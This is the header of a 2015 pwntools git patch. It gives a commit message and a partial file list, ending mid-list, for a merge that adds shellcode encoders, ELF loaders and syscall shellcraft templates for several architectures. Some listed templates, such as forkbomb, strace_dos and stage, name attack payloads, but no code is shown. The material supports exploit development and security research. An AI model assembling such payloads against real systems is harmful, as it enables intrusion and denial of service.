From 11fa0d8d6d55eae5d8e9cb39f050f4f07217b5fe Mon Sep 17 00:00:00 2001 From: Zach Riggle Date: Tue, 11 Aug 2015 16:55:27 -0400 Subject: [PATCH] This contains a large merge from the Samurai internal repo. Changes: - `pwn/init` initialization code simplified, and some was moved to `pwnlib/args` - `scramble` script added to `pwnlib.commandline`; support for encoders added to relevant scripts - Added shellcode encoders for several architectures - Added CGC architecture shellcode and constants - Added Shellcraft templates for every syscall - Added `xor_key` helper for generating a 4-byte XOR key for a data stream - Added `getdents` for use with the relevant shellcraft scripts - Add ELF loaders for all architectures - Lots of MIPS and AArch64 shellcode --- .travis.yml | 1 + docs/source/conf.py | 2 + docs/source/shellcraft/thumb.rst | 2 +- pwn/__init__.py | 81 +--- pwn/toplevel.py | 2 + pwnlib/__init__.py | 1 + pwnlib/abi.py | 107 +---- pwnlib/args.py | 112 +++++ pwnlib/asm.py | 30 +- pwnlib/commandline/asm.py | 34 +- pwnlib/commandline/common.py | 4 +- pwnlib/commandline/constgrep.py | 4 +- pwnlib/commandline/elfdiff.py | 22 +- pwnlib/commandline/pwnstrip.py | 53 ++ pwnlib/commandline/scramble.py | 103 ++++ pwnlib/commandline/shellcraft.py | 79 ++- pwnlib/constants/cgc/__init__.py | 0 pwnlib/constants/cgc/aarch64.py | 1 + pwnlib/constants/cgc/alpha.py | 1 + pwnlib/constants/cgc/amd64.py | 1 + pwnlib/constants/cgc/arm.py | 1 + pwnlib/constants/cgc/i386.py | 1 + pwnlib/constants/cgc/ia64.py | 1 + pwnlib/constants/cgc/mips.py | 1 + pwnlib/constants/cgc/powerpc.py | 1 + pwnlib/constants/cgc/powerpc64.py | 1 + pwnlib/constants/cgc/s390.py | 1 + pwnlib/constants/cgc/s390x.py | 1 + pwnlib/constants/cgc/sparc.py | 1 + pwnlib/constants/cgc/sparc64.py | 1 + pwnlib/constants/cgc/thumb.py | 28 ++ pwnlib/context/__init__.py | 20 +- pwnlib/data/includes/cgc/aarch64.h | 1 + pwnlib/data/includes/cgc/alpha.h | 1 + pwnlib/data/includes/cgc/amd64.h | 1 + pwnlib/data/includes/cgc/arm.h | 21 + pwnlib/data/includes/cgc/i386.h | 1 + pwnlib/data/includes/cgc/ia64.h | 1 + pwnlib/data/includes/cgc/mips.h | 1 + pwnlib/data/includes/cgc/powerpc.h | 1 + pwnlib/data/includes/cgc/powerpc64.h | 1 + pwnlib/data/includes/cgc/s390.h | 1 + pwnlib/data/includes/cgc/s390x.h | 1 + pwnlib/data/includes/cgc/sparc.h | 1 + pwnlib/data/includes/cgc/sparc64.h | 1 + pwnlib/data/includes/cgc/thumb.h | 1 + pwnlib/dynelf.py | 8 + pwnlib/encoders/__init__.py | 9 +- pwnlib/encoders/amd64/__init__.py | 1 + pwnlib/encoders/amd64/delta.py | 42 ++ pwnlib/encoders/arm/__init__.py | 2 + .../arm/alphanumeric/ARM_Instructions.py | 139 ++++++ pwnlib/encoders/arm/alphanumeric/__init__.py | 47 ++ .../arm/alphanumeric/alphanum_byte.py | 49 ++ .../encoders/arm/alphanumeric/alphanumeric.py | 0 pwnlib/encoders/arm/alphanumeric/builder.py | 454 ++++++++++++++++++ .../encoders/arm/alphanumeric/random_funcs.py | 36 ++ pwnlib/encoders/arm/xor.py | 55 +++ pwnlib/encoders/i386/__init__.py | 1 + pwnlib/encoders/i386/delta.py | 79 +++ pwnlib/encoders/mips/__init__.py | 1 + pwnlib/encoders/mips/xor.py | 135 ++++++ pwnlib/gdb.py | 26 +- pwnlib/lexer.py | 3 +- pwnlib/regsort.py | 30 +- pwnlib/rop/srop.py | 12 +- pwnlib/shellcraft/__init__.py | 23 + pwnlib/shellcraft/internal.py | 15 +- pwnlib/shellcraft/registers.py | 63 ++- pwnlib/shellcraft/templates/aarch64/__doc__ | 0 .../shellcraft/templates/aarch64/infloop.asm | 5 + .../templates/aarch64/linux/__doc__ | 0 .../templates/aarch64/linux/accept.asm | 15 + .../templates/aarch64/linux/access.asm | 14 + .../templates/aarch64/linux/acct.asm | 13 + .../templates/aarch64/linux/alarm.asm | 13 + .../templates/aarch64/linux/bind.asm | 15 + .../templates/aarch64/linux/brk.asm | 13 + .../templates/aarch64/linux/cat.asm | 18 + .../templates/aarch64/linux/chdir.asm | 13 + .../templates/aarch64/linux/chmod.asm | 14 + .../templates/aarch64/linux/chown.asm | 15 + .../templates/aarch64/linux/chroot.asm | 13 + .../templates/aarch64/linux/clock_getres.asm | 14 + .../templates/aarch64/linux/clock_gettime.asm | 14 + .../aarch64/linux/clock_nanosleep.asm | 16 + .../templates/aarch64/linux/clock_settime.asm | 14 + .../templates/aarch64/linux/clone.asm | 17 + .../templates/aarch64/linux/close.asm | 13 + .../templates/aarch64/linux/connect.asm | 26 + .../templates/aarch64/linux/creat.asm | 14 + .../templates/aarch64/linux/dup.asm | 13 + .../templates/aarch64/linux/dup2.asm | 14 + .../templates/aarch64/linux/dup3.asm | 15 + .../templates/aarch64/linux/echo.asm | 14 + .../templates/aarch64/linux/epoll_create.asm | 13 + .../templates/aarch64/linux/epoll_create1.asm | 13 + .../templates/aarch64/linux/epoll_ctl.asm | 16 + .../templates/aarch64/linux/epoll_pwait.asm | 17 + .../templates/aarch64/linux/epoll_wait.asm | 16 + .../templates/aarch64/linux/execve.asm | 15 + .../templates/aarch64/linux/exit.asm | 13 + .../templates/aarch64/linux/faccessat.asm | 16 + .../templates/aarch64/linux/fallocate.asm | 16 + .../templates/aarch64/linux/fchdir.asm | 13 + .../templates/aarch64/linux/fchmod.asm | 14 + .../templates/aarch64/linux/fchmodat.asm | 16 + .../templates/aarch64/linux/fchown.asm | 15 + .../templates/aarch64/linux/fchownat.asm | 17 + .../templates/aarch64/linux/fcntl.asm | 15 + .../templates/aarch64/linux/fdatasync.asm | 13 + .../templates/aarch64/linux/flock.asm | 14 + .../templates/aarch64/linux/fork.asm | 13 + .../templates/aarch64/linux/forkexit.asm | 16 + .../templates/aarch64/linux/fstat.asm | 14 + .../templates/aarch64/linux/fstat64.asm | 14 + .../templates/aarch64/linux/fstatat64.asm | 16 + .../templates/aarch64/linux/fsync.asm | 13 + .../templates/aarch64/linux/ftruncate.asm | 14 + .../templates/aarch64/linux/ftruncate64.asm | 14 + .../templates/aarch64/linux/futimesat.asm | 15 + .../templates/aarch64/linux/getcwd.asm | 14 + .../templates/aarch64/linux/getegid.asm | 13 + .../templates/aarch64/linux/geteuid.asm | 13 + .../templates/aarch64/linux/getgid.asm | 13 + .../templates/aarch64/linux/getgroups.asm | 14 + .../templates/aarch64/linux/getitimer.asm | 14 + .../templates/aarch64/linux/getpeername.asm | 15 + .../templates/aarch64/linux/getpgid.asm | 13 + .../templates/aarch64/linux/getpgrp.asm | 13 + .../templates/aarch64/linux/getpid.asm | 13 + .../templates/aarch64/linux/getpmsg.asm | 17 + .../templates/aarch64/linux/getppid.asm | 13 + .../templates/aarch64/linux/getpriority.asm | 14 + .../templates/aarch64/linux/getresgid.asm | 15 + .../templates/aarch64/linux/getresuid.asm | 15 + .../templates/aarch64/linux/getrlimit.asm | 14 + .../templates/aarch64/linux/getrusage.asm | 14 + .../templates/aarch64/linux/getsid.asm | 13 + .../templates/aarch64/linux/getsockname.asm | 15 + .../templates/aarch64/linux/getsockopt.asm | 17 + .../templates/aarch64/linux/gettimeofday.asm | 14 + .../templates/aarch64/linux/getuid.asm | 13 + .../templates/aarch64/linux/gtty.asm | 14 + .../templates/aarch64/linux/ioctl.asm | 15 + .../templates/aarch64/linux/ioperm.asm | 15 + .../templates/aarch64/linux/iopl.asm | 13 + .../templates/aarch64/linux/kill.asm | 14 + .../templates/aarch64/linux/lchown.asm | 15 + .../templates/aarch64/linux/link.asm | 14 + .../templates/aarch64/linux/linkat.asm | 17 + .../templates/aarch64/linux/listen.asm | 14 + .../templates/aarch64/linux/loader.asm | 183 +++++++ .../templates/aarch64/linux/loader_append.asm | 54 +++ .../templates/aarch64/linux/lseek.asm | 15 + .../templates/aarch64/linux/lstat.asm | 14 + .../templates/aarch64/linux/lstat64.asm | 14 + .../templates/aarch64/linux/madvise.asm | 15 + .../templates/aarch64/linux/mincore.asm | 15 + .../templates/aarch64/linux/mkdir.asm | 14 + .../templates/aarch64/linux/mkdirat.asm | 15 + .../templates/aarch64/linux/mknod.asm | 15 + .../templates/aarch64/linux/mknodat.asm | 16 + .../templates/aarch64/linux/mlock.asm | 14 + .../templates/aarch64/linux/mlockall.asm | 13 + .../templates/aarch64/linux/mmap.asm | 18 + .../templates/aarch64/linux/mprotect.asm | 15 + .../templates/aarch64/linux/mq_notify.asm | 14 + .../templates/aarch64/linux/mq_open.asm | 15 + .../aarch64/linux/mq_timedreceive.asm | 17 + .../templates/aarch64/linux/mq_timedsend.asm | 17 + .../templates/aarch64/linux/mq_unlink.asm | 13 + .../templates/aarch64/linux/mremap.asm | 17 + .../templates/aarch64/linux/msync.asm | 15 + .../templates/aarch64/linux/munlock.asm | 14 + .../templates/aarch64/linux/munlockall.asm | 13 + .../templates/aarch64/linux/munmap.asm | 14 + .../templates/aarch64/linux/nanosleep.asm | 14 + .../templates/aarch64/linux/nice.asm | 13 + .../templates/aarch64/linux/open.asm | 15 + .../templates/aarch64/linux/openat.asm | 16 + .../templates/aarch64/linux/pause.asm | 13 + .../templates/aarch64/linux/pipe.asm | 13 + .../templates/aarch64/linux/pipe2.asm | 14 + .../templates/aarch64/linux/poll.asm | 15 + .../templates/aarch64/linux/ppoll.asm | 16 + .../templates/aarch64/linux/prctl.asm | 14 + .../templates/aarch64/linux/pread.asm | 16 + .../templates/aarch64/linux/preadv.asm | 16 + .../templates/aarch64/linux/prlimit64.asm | 16 + .../templates/aarch64/linux/profil.asm | 16 + .../templates/aarch64/linux/ptrace.asm | 14 + .../templates/aarch64/linux/putpmsg.asm | 17 + .../templates/aarch64/linux/pwrite.asm | 16 + .../templates/aarch64/linux/pwritev.asm | 16 + .../templates/aarch64/linux/read.asm | 15 + .../templates/aarch64/linux/readahead.asm | 15 + .../templates/aarch64/linux/readdir.asm | 13 + .../templates/aarch64/linux/readlink.asm | 15 + .../templates/aarch64/linux/readlinkat.asm | 16 + .../templates/aarch64/linux/readn.asm | 23 + .../templates/aarch64/linux/readv.asm | 15 + .../templates/aarch64/linux/recv.asm | 16 + .../templates/aarch64/linux/recvfrom.asm | 18 + .../templates/aarch64/linux/recvmmsg.asm | 17 + .../templates/aarch64/linux/recvmsg.asm | 15 + .../aarch64/linux/remap_file_pages.asm | 17 + .../templates/aarch64/linux/rename.asm | 14 + .../templates/aarch64/linux/renameat.asm | 16 + .../templates/aarch64/linux/rmdir.asm | 13 + .../aarch64/linux/sched_get_priority_max.asm | 13 + .../aarch64/linux/sched_get_priority_min.asm | 13 + .../aarch64/linux/sched_getaffinity.asm | 15 + .../aarch64/linux/sched_getparam.asm | 14 + .../aarch64/linux/sched_getscheduler.asm | 13 + .../aarch64/linux/sched_rr_get_interval.asm | 14 + .../aarch64/linux/sched_setaffinity.asm | 15 + .../aarch64/linux/sched_setparam.asm | 14 + .../aarch64/linux/sched_setscheduler.asm | 15 + .../templates/aarch64/linux/sched_yield.asm | 13 + .../templates/aarch64/linux/select.asm | 17 + .../templates/aarch64/linux/sendfile.asm | 16 + .../templates/aarch64/linux/sendfile64.asm | 16 + .../templates/aarch64/linux/setdomainname.asm | 14 + .../templates/aarch64/linux/setgid.asm | 13 + .../templates/aarch64/linux/setgroups.asm | 14 + .../templates/aarch64/linux/sethostname.asm | 14 + .../templates/aarch64/linux/setitimer.asm | 15 + .../templates/aarch64/linux/setpgid.asm | 14 + .../templates/aarch64/linux/setpriority.asm | 15 + .../templates/aarch64/linux/setregid.asm | 14 + .../templates/aarch64/linux/setresgid.asm | 15 + .../templates/aarch64/linux/setresuid.asm | 15 + .../templates/aarch64/linux/setreuid.asm | 14 + .../templates/aarch64/linux/setrlimit.asm | 14 + .../templates/aarch64/linux/setsid.asm | 13 + .../templates/aarch64/linux/setsockopt.asm | 17 + .../aarch64/linux/setsockopt_timeout.asm | 19 + .../templates/aarch64/linux/settimeofday.asm | 14 + .../templates/aarch64/linux/setuid.asm | 13 + .../templates/aarch64/linux/sigaction.asm | 15 + .../templates/aarch64/linux/sigaltstack.asm | 14 + .../templates/aarch64/linux/signal.asm | 14 + .../templates/aarch64/linux/sigpending.asm | 13 + .../templates/aarch64/linux/sigprocmask.asm | 16 + .../templates/aarch64/linux/sigreturn.asm | 10 + .../templates/aarch64/linux/sigsuspend.asm | 13 + .../templates/aarch64/linux/socket.asm | 16 + .../templates/aarch64/linux/splice.asm | 18 + .../templates/aarch64/linux/stage.asm | 61 +++ .../templates/aarch64/linux/stat.asm | 14 + .../templates/aarch64/linux/stat64.asm | 14 + .../templates/aarch64/linux/stime.asm | 13 + .../templates/aarch64/linux/stty.asm | 14 + .../templates/aarch64/linux/symlink.asm | 14 + .../templates/aarch64/linux/symlinkat.asm | 15 + .../templates/aarch64/linux/sync.asm | 13 + .../aarch64/linux/sync_file_range.asm | 16 + .../templates/aarch64/linux/syscall.asm | 57 +++ .../templates/aarch64/linux/syslog.asm | 15 + .../templates/aarch64/linux/tee.asm | 16 + .../templates/aarch64/linux/time.asm | 13 + .../templates/aarch64/linux/timer_create.asm | 15 + .../templates/aarch64/linux/timer_delete.asm | 13 + .../aarch64/linux/timer_getoverrun.asm | 13 + .../templates/aarch64/linux/timer_gettime.asm | 14 + .../templates/aarch64/linux/timer_settime.asm | 16 + .../templates/aarch64/linux/truncate.asm | 14 + .../templates/aarch64/linux/truncate64.asm | 14 + .../templates/aarch64/linux/ulimit.asm | 14 + .../templates/aarch64/linux/umask.asm | 13 + .../templates/aarch64/linux/uname.asm | 13 + .../templates/aarch64/linux/unlink.asm | 13 + .../templates/aarch64/linux/unlinkat.asm | 15 + .../templates/aarch64/linux/unshare.asm | 13 + .../templates/aarch64/linux/ustat.asm | 14 + .../templates/aarch64/linux/utime.asm | 14 + .../templates/aarch64/linux/utimensat.asm | 16 + .../templates/aarch64/linux/utimes.asm | 14 + .../templates/aarch64/linux/vfork.asm | 13 + .../templates/aarch64/linux/vhangup.asm | 13 + .../templates/aarch64/linux/vmsplice.asm | 16 + .../templates/aarch64/linux/wait4.asm | 16 + .../templates/aarch64/linux/waitid.asm | 16 + .../templates/aarch64/linux/waitpid.asm | 15 + .../templates/aarch64/linux/write.asm | 15 + .../templates/aarch64/linux/writev.asm | 15 + pwnlib/shellcraft/templates/aarch64/mov.asm | 108 +++++ .../shellcraft/templates/aarch64/pushstr.asm | 54 +++ .../shellcraft/templates/aarch64/setregs.asm | 43 ++ pwnlib/shellcraft/templates/aarch64/xor.asm | 67 +++ pwnlib/shellcraft/templates/amd64/crash.asm | 13 + pwnlib/shellcraft/templates/amd64/itoa.asm | 60 +++ .../templates/amd64/linux/accept.asm | 15 + .../templates/amd64/linux/access.asm | 14 + .../shellcraft/templates/amd64/linux/acct.asm | 13 + .../templates/amd64/linux/alarm.asm | 13 + .../shellcraft/templates/amd64/linux/bind.asm | 15 + .../shellcraft/templates/amd64/linux/brk.asm | 13 + .../templates/amd64/linux/chdir.asm | 13 + .../templates/amd64/linux/chmod.asm | 14 + .../templates/amd64/linux/chown.asm | 15 + .../templates/amd64/linux/chroot.asm | 13 + .../templates/amd64/linux/clock_getres.asm | 14 + .../templates/amd64/linux/clock_gettime.asm | 14 + .../templates/amd64/linux/clock_nanosleep.asm | 16 + .../templates/amd64/linux/clock_settime.asm | 14 + .../templates/amd64/linux/clone.asm | 17 + .../templates/amd64/linux/close.asm | 13 + .../templates/amd64/linux/connect.asm | 19 +- .../templates/amd64/linux/creat.asm | 14 + .../shellcraft/templates/amd64/linux/dup2.asm | 14 + .../shellcraft/templates/amd64/linux/dup3.asm | 15 + .../shellcraft/templates/amd64/linux/echo.asm | 2 +- .../templates/amd64/linux/egghunter.asm | 73 +++ .../templates/amd64/linux/epoll_create.asm | 13 + .../templates/amd64/linux/epoll_create1.asm | 13 + .../templates/amd64/linux/epoll_ctl.asm | 16 + .../templates/amd64/linux/epoll_pwait.asm | 17 + .../templates/amd64/linux/epoll_wait.asm | 16 + .../templates/amd64/linux/execve.asm | 51 ++ .../templates/amd64/linux/faccessat.asm | 16 + .../templates/amd64/linux/fallocate.asm | 16 + .../templates/amd64/linux/fchdir.asm | 13 + .../templates/amd64/linux/fchmod.asm | 14 + .../templates/amd64/linux/fchmodat.asm | 16 + .../templates/amd64/linux/fchown.asm | 15 + .../templates/amd64/linux/fchownat.asm | 17 + .../templates/amd64/linux/fcntl.asm | 15 + .../templates/amd64/linux/fdatasync.asm | 13 + .../templates/amd64/linux/flock.asm | 14 + .../shellcraft/templates/amd64/linux/fork.asm | 13 + .../templates/amd64/linux/forkbomb.asm | 13 + .../templates/amd64/linux/forkexit.asm | 16 + .../templates/amd64/linux/fstat.asm | 14 + .../templates/amd64/linux/fstat64.asm | 14 + .../templates/amd64/linux/fstatat64.asm | 16 + .../templates/amd64/linux/fsync.asm | 13 + .../templates/amd64/linux/ftruncate.asm | 14 + .../templates/amd64/linux/ftruncate64.asm | 14 + .../templates/amd64/linux/futimesat.asm | 15 + .../templates/amd64/linux/getcwd.asm | 14 + .../templates/amd64/linux/getegid.asm | 13 + .../templates/amd64/linux/geteuid.asm | 13 + .../templates/amd64/linux/getgid.asm | 13 + .../templates/amd64/linux/getgroups.asm | 14 + .../templates/amd64/linux/getitimer.asm | 14 + .../templates/amd64/linux/getpeername.asm | 15 + .../templates/amd64/linux/getpgid.asm | 13 + .../templates/amd64/linux/getpgrp.asm | 13 + .../templates/amd64/linux/getpid.asm | 4 + .../templates/amd64/linux/getpmsg.asm | 17 + .../templates/amd64/linux/getppid.asm | 13 + .../templates/amd64/linux/getpriority.asm | 14 + .../templates/amd64/linux/getresgid.asm | 15 + .../templates/amd64/linux/getresuid.asm | 15 + .../templates/amd64/linux/getrlimit.asm | 14 + .../templates/amd64/linux/getrusage.asm | 14 + .../templates/amd64/linux/getsid.asm | 13 + .../templates/amd64/linux/getsockname.asm | 15 + .../templates/amd64/linux/getsockopt.asm | 17 + .../templates/amd64/linux/gettimeofday.asm | 14 + .../templates/amd64/linux/getuid.asm | 13 + .../shellcraft/templates/amd64/linux/gtty.asm | 14 + .../templates/amd64/linux/ioctl.asm | 15 + .../templates/amd64/linux/ioperm.asm | 15 + .../shellcraft/templates/amd64/linux/iopl.asm | 13 + .../shellcraft/templates/amd64/linux/kill.asm | 5 + .../templates/amd64/linux/killparent.asm | 17 + .../templates/amd64/linux/lchown.asm | 15 + .../shellcraft/templates/amd64/linux/link.asm | 14 + .../templates/amd64/linux/linkat.asm | 17 + .../templates/amd64/linux/loader.asm | 221 +++++++++ .../templates/amd64/linux/loader_append.asm | 55 +++ .../templates/amd64/linux/lseek.asm | 15 + .../templates/amd64/linux/lstat.asm | 14 + .../templates/amd64/linux/lstat64.asm | 14 + .../templates/amd64/linux/madvise.asm | 15 + .../templates/amd64/linux/membot.asm | 48 ++ .../templates/amd64/linux/migrate_stack.asm | 8 + .../templates/amd64/linux/mincore.asm | 15 + .../templates/amd64/linux/mkdir.asm | 14 + .../templates/amd64/linux/mkdirat.asm | 15 + .../templates/amd64/linux/mknod.asm | 15 + .../templates/amd64/linux/mknodat.asm | 16 + .../templates/amd64/linux/mlock.asm | 14 + .../templates/amd64/linux/mlockall.asm | 13 + .../shellcraft/templates/amd64/linux/mmap.asm | 17 + .../templates/amd64/linux/mmap_rwx.asm | 11 + .../shellcraft/templates/amd64/linux/mov.asm | 22 +- .../templates/amd64/linux/mprotect.asm | 15 + .../templates/amd64/linux/mq_notify.asm | 14 + .../templates/amd64/linux/mq_open.asm | 15 + .../templates/amd64/linux/mq_timedreceive.asm | 17 + .../templates/amd64/linux/mq_timedsend.asm | 17 + .../templates/amd64/linux/mq_unlink.asm | 13 + .../templates/amd64/linux/mremap.asm | 17 + .../templates/amd64/linux/msync.asm | 15 + .../templates/amd64/linux/munlock.asm | 14 + .../templates/amd64/linux/munlockall.asm | 13 + .../templates/amd64/linux/munmap.asm | 14 + .../templates/amd64/linux/nanosleep.asm | 14 + .../shellcraft/templates/amd64/linux/nice.asm | 13 + .../shellcraft/templates/amd64/linux/open.asm | 15 + .../templates/amd64/linux/openat.asm | 16 + .../templates/amd64/linux/pause.asm | 13 + .../shellcraft/templates/amd64/linux/pipe.asm | 13 + .../templates/amd64/linux/pipe2.asm | 14 + .../shellcraft/templates/amd64/linux/poll.asm | 15 + .../templates/amd64/linux/ppoll.asm | 16 + .../templates/amd64/linux/prctl.asm | 14 + .../templates/amd64/linux/pread.asm | 16 + .../templates/amd64/linux/preadv.asm | 16 + .../templates/amd64/linux/prlimit64.asm | 16 + .../templates/amd64/linux/profil.asm | 16 + .../templates/amd64/linux/ptrace.asm | 14 + .../shellcraft/templates/amd64/linux/push.asm | 22 +- .../templates/amd64/linux/putpmsg.asm | 17 + .../templates/amd64/linux/pwrite.asm | 16 + .../templates/amd64/linux/pwritev.asm | 16 + .../shellcraft/templates/amd64/linux/read.asm | 17 +- .../templates/amd64/linux/read_upto.asm | 6 + .../templates/amd64/linux/readahead.asm | 15 + .../templates/amd64/linux/readdir.asm | 13 + .../templates/amd64/linux/readinto.asm | 22 + .../templates/amd64/linux/readlink.asm | 15 + .../templates/amd64/linux/readlinkat.asm | 16 + .../templates/amd64/linux/readloop.asm | 25 + .../templates/amd64/linux/readn.asm | 23 + .../templates/amd64/linux/readptr.asm | 7 + .../templates/amd64/linux/readv.asm | 15 + .../shellcraft/templates/amd64/linux/recv.asm | 16 + .../templates/amd64/linux/recvfrom.asm | 18 + .../templates/amd64/linux/recvmmsg.asm | 17 + .../templates/amd64/linux/recvmsg.asm | 15 + .../amd64/linux/remap_file_pages.asm | 17 + .../templates/amd64/linux/rename.asm | 14 + .../templates/amd64/linux/renameat.asm | 16 + .../templates/amd64/linux/rmdir.asm | 13 + .../amd64/linux/sched_get_priority_max.asm | 13 + .../amd64/linux/sched_get_priority_min.asm | 13 + .../amd64/linux/sched_getaffinity.asm | 15 + .../templates/amd64/linux/sched_getparam.asm | 14 + .../amd64/linux/sched_getscheduler.asm | 13 + .../amd64/linux/sched_rr_get_interval.asm | 14 + .../amd64/linux/sched_setaffinity.asm | 15 + .../templates/amd64/linux/sched_setparam.asm | 14 + .../amd64/linux/sched_setscheduler.asm | 15 + .../templates/amd64/linux/sched_yield.asm | 13 + .../templates/amd64/linux/select.asm | 17 + .../templates/amd64/linux/sendfile.asm | 16 + .../templates/amd64/linux/sendfile64.asm | 16 + .../templates/amd64/linux/setdomainname.asm | 14 + .../templates/amd64/linux/setgid.asm | 13 + .../templates/amd64/linux/setgroups.asm | 14 + .../templates/amd64/linux/sethostname.asm | 14 + .../templates/amd64/linux/setitimer.asm | 15 + .../templates/amd64/linux/setpgid.asm | 14 + .../templates/amd64/linux/setpriority.asm | 15 + .../templates/amd64/linux/setresgid.asm | 15 + .../templates/amd64/linux/setresuid.asm | 15 + .../templates/amd64/linux/setrlimit.asm | 14 + .../templates/amd64/linux/setsid.asm | 13 + .../templates/amd64/linux/setsockopt.asm | 17 + .../amd64/linux/setsockopt_timeout.asm | 19 + .../templates/amd64/linux/settimeofday.asm | 14 + .../templates/amd64/linux/setuid.asm | 13 + .../shellcraft/templates/amd64/linux/sh.asm | 11 +- .../templates/amd64/linux/sigaction.asm | 15 + .../templates/amd64/linux/sigaltstack.asm | 14 + .../templates/amd64/linux/signal.asm | 14 + .../templates/amd64/linux/sigpending.asm | 13 + .../templates/amd64/linux/sigprocmask.asm | 16 + .../templates/amd64/linux/sigreturn.asm | 4 +- .../templates/amd64/linux/sigsuspend.asm | 13 + .../templates/amd64/linux/socket.asm | 16 + .../templates/amd64/linux/splice.asm | 18 + .../templates/amd64/linux/stage.asm | 58 +++ .../shellcraft/templates/amd64/linux/stat.asm | 14 + .../templates/amd64/linux/stat64.asm | 14 + .../templates/amd64/linux/stime.asm | 13 + .../templates/amd64/linux/strace_dos.asm | 40 ++ .../shellcraft/templates/amd64/linux/stty.asm | 14 + .../templates/amd64/linux/symlink.asm | 14 + .../templates/amd64/linux/symlinkat.asm | 15 + .../shellcraft/templates/amd64/linux/sync.asm | 13 + .../templates/amd64/linux/sync_file_range.asm | 16 + .../templates/amd64/linux/syscall.asm | 72 ++- .../templates/amd64/linux/syslog.asm | 15 + .../shellcraft/templates/amd64/linux/tee.asm | 16 + .../shellcraft/templates/amd64/linux/time.asm | 13 + .../templates/amd64/linux/timer_create.asm | 15 + .../templates/amd64/linux/timer_delete.asm | 13 + .../amd64/linux/timer_getoverrun.asm | 13 + .../templates/amd64/linux/timer_gettime.asm | 14 + .../templates/amd64/linux/timer_settime.asm | 16 + .../templates/amd64/linux/truncate.asm | 14 + .../templates/amd64/linux/truncate64.asm | 14 + .../templates/amd64/linux/ulimit.asm | 14 + .../templates/amd64/linux/umask.asm | 13 + .../templates/amd64/linux/uname.asm | 13 + .../templates/amd64/linux/unlink.asm | 13 + .../templates/amd64/linux/unlinkat.asm | 15 + .../templates/amd64/linux/unshare.asm | 13 + .../templates/amd64/linux/ustat.asm | 14 + .../templates/amd64/linux/utime.asm | 14 + .../templates/amd64/linux/utimensat.asm | 16 + .../templates/amd64/linux/utimes.asm | 14 + .../templates/amd64/linux/vfork.asm | 13 + .../templates/amd64/linux/vhangup.asm | 13 + .../templates/amd64/linux/vmsplice.asm | 16 + .../templates/amd64/linux/wait4.asm | 16 + .../templates/amd64/linux/waitid.asm | 16 + .../templates/amd64/linux/waitpid.asm | 15 + .../templates/amd64/linux/write.asm | 15 + .../templates/amd64/linux/writeloop.asm | 25 + .../templates/amd64/linux/writev.asm | 15 + pwnlib/shellcraft/templates/amd64/memcpy.asm | 13 + pwnlib/shellcraft/templates/amd64/mov.asm | 82 ++-- pwnlib/shellcraft/templates/amd64/popad.asm | 13 + pwnlib/shellcraft/templates/amd64/push.asm | 25 +- pwnlib/shellcraft/templates/amd64/pushad.asm | 13 + pwnlib/shellcraft/templates/amd64/pushstr.asm | 47 +- .../templates/amd64/pushstr_array.asm | 38 ++ pwnlib/shellcraft/templates/amd64/setregs.asm | 45 +- pwnlib/shellcraft/templates/amd64/strcpy.asm | 32 ++ pwnlib/shellcraft/templates/amd64/strlen.asm | 35 ++ pwnlib/shellcraft/templates/amd64/xor.asm | 82 ++++ pwnlib/shellcraft/templates/arm/crash.asm | 12 + pwnlib/shellcraft/templates/arm/itoa.asm | 75 +++ .../shellcraft/templates/arm/linux/accept.asm | 15 + .../shellcraft/templates/arm/linux/access.asm | 14 + .../shellcraft/templates/arm/linux/acct.asm | 13 + .../shellcraft/templates/arm/linux/alarm.asm | 13 + .../shellcraft/templates/arm/linux/bind.asm | 15 + pwnlib/shellcraft/templates/arm/linux/brk.asm | 13 + .../templates/arm/linux/cacheflush.asm | 31 ++ pwnlib/shellcraft/templates/arm/linux/cat.asm | 19 + .../shellcraft/templates/arm/linux/chdir.asm | 13 + .../shellcraft/templates/arm/linux/chmod.asm | 14 + .../shellcraft/templates/arm/linux/chown.asm | 15 + .../shellcraft/templates/arm/linux/chroot.asm | 13 + .../templates/arm/linux/clock_getres.asm | 14 + .../templates/arm/linux/clock_gettime.asm | 14 + .../templates/arm/linux/clock_nanosleep.asm | 16 + .../templates/arm/linux/clock_settime.asm | 14 + .../shellcraft/templates/arm/linux/clone.asm | 17 + .../shellcraft/templates/arm/linux/close.asm | 13 + .../templates/arm/linux/connect.asm | 26 + .../shellcraft/templates/arm/linux/creat.asm | 14 + pwnlib/shellcraft/templates/arm/linux/dir.asm | 21 + pwnlib/shellcraft/templates/arm/linux/dup.asm | 13 + .../shellcraft/templates/arm/linux/dup2.asm | 14 + .../shellcraft/templates/arm/linux/dup3.asm | 15 + .../shellcraft/templates/arm/linux/echo.asm | 14 + .../templates/arm/linux/epoll_create.asm | 13 + .../templates/arm/linux/epoll_create1.asm | 13 + .../templates/arm/linux/epoll_ctl.asm | 16 + .../templates/arm/linux/epoll_pwait.asm | 17 + .../templates/arm/linux/epoll_wait.asm | 16 + .../shellcraft/templates/arm/linux/execve.asm | 26 + .../shellcraft/templates/arm/linux/exit.asm | 13 + .../templates/arm/linux/faccessat.asm | 16 + .../templates/arm/linux/fallocate.asm | 16 + .../shellcraft/templates/arm/linux/fchdir.asm | 13 + .../shellcraft/templates/arm/linux/fchmod.asm | 14 + .../templates/arm/linux/fchmodat.asm | 16 + .../shellcraft/templates/arm/linux/fchown.asm | 15 + .../templates/arm/linux/fchownat.asm | 17 + .../shellcraft/templates/arm/linux/fcntl.asm | 15 + .../templates/arm/linux/fdatasync.asm | 13 + .../shellcraft/templates/arm/linux/flock.asm | 14 + .../shellcraft/templates/arm/linux/fork.asm | 13 + .../templates/arm/linux/forkbomb.asm | 13 + .../templates/arm/linux/forkexit.asm | 16 + .../shellcraft/templates/arm/linux/fstat.asm | 14 + .../templates/arm/linux/fstat64.asm | 14 + .../templates/arm/linux/fstatat64.asm | 16 + .../shellcraft/templates/arm/linux/fsync.asm | 13 + .../templates/arm/linux/ftruncate.asm | 14 + .../templates/arm/linux/ftruncate64.asm | 14 + .../templates/arm/linux/futimesat.asm | 15 + .../shellcraft/templates/arm/linux/getcwd.asm | 14 + .../templates/arm/linux/getdents.asm | 14 + .../templates/arm/linux/getegid.asm | 13 + .../templates/arm/linux/geteuid.asm | 13 + .../shellcraft/templates/arm/linux/getgid.asm | 13 + .../templates/arm/linux/getgroups.asm | 14 + .../templates/arm/linux/getitimer.asm | 14 + .../templates/arm/linux/getpeername.asm | 15 + .../templates/arm/linux/getpgid.asm | 13 + .../templates/arm/linux/getpgrp.asm | 13 + .../shellcraft/templates/arm/linux/getpid.asm | 13 + .../templates/arm/linux/getpmsg.asm | 17 